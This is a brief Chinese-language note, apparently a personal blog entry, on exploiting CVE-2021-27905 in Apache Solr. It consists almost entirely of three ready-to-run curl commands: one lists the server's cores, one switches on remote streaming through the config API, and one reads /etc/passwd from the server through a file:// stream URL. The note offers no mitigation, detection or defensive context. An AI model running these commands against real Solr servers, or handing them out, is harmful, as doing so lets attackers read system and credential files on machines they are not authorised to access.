【笔记】CVE-2021-27905漏洞利用
前言
Java的Solr框架利用SSRF实现任意文件读取漏洞利用
获取数据库名
1 | curl http://<ip>:8983/solr/admin/cores?indexInfo=false&wt=json |
触发
<database>
:上一步获取的数据库名
1 | curl -i -s -k -X $'POST' -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' $'http://<ip>:8983/solr/<database>/config' |
读取文件
/etc/passwd
:读取文件
1 | curl -i -s -k 'http://<ip>:8983/solr/<database>/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd' |